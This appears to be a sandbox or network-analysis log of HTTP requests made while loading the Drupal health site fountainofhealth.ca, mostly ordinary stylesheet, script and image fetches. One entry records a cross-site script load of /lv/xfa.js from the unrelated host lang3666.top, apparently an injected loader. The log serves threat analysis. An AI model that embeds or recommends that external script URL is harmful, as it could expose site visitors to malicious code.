                                  Source: global trafficHTTP traffic detected: GET /modules/ajax_loader/css/wave.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                                  Source: global trafficHTTP traffic detected: GET /modules/webform/modules/webform_bootstrap/css/webform_bootstrap.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                                  Source: global trafficHTTP traffic detected: GET /core/modules/layout_discovery/layouts/onecol/onecol.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                                  Source: global trafficHTTP traffic detected: GET /themes/custom/foh/css/style.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                                  Source: global trafficHTTP traffic detected: GET /themes/custom/foh/css/questionnaire.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                                  Source: global trafficHTTP traffic detected: GET /themes/custom/foh/css/banner-slider.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                                  Source: global trafficHTTP traffic detected: GET /lv/xfa.js HTTP/1.1Host: lang3666.topConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://fountainofhealth.ca/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/inline-images/twitter.svg HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0; _ga=GA1.1.1981881509.1747926276
                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/inline-images/youtube.svg HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0; _ga=GA1.1.1981881509.1747926276
                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/inline-images/facebook.svg HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0; _ga=GA1.1.1981881509.1747926276
                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/inline-images/Message-Blue.png HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/inline-images/Info-Blue.png HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /core/assets/vendor/jquery/jquery.min.js?v=3.7.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /core/assets/vendor/underscore/underscore-min.js?v=1.13.6 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /core/assets/vendor/once/once.min.js?v=1.0.1 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /core/misc/drupalSettingsLoader.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /core/misc/drupal.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /core/misc/drupal.init.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/version-min.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/data-min.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/disable-selection-min.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/form-min.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/jquery-patch-min.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/scroll-parent-min.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/inline-images/twitter.svg HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/inline-images/youtube.svg HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/inline-images/facebook.svg HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/inline-images/Message-Blue.png HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/inline-images/Info-Blue.png HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/unique-id-min.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/focusable-min.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/ie-min.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /themes/custom/foh/css/Poppins-Regular.ttf HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveOrigin: https://fountainofhealth.casec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://fountainofhealth.ca/themes/custom/foh/css/style.css?swjs7bAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/keycode-min.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/plugin-min.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/inline-images/FOH_EN_LOGO_Clr2024.svg HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/safe-active-element-min.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
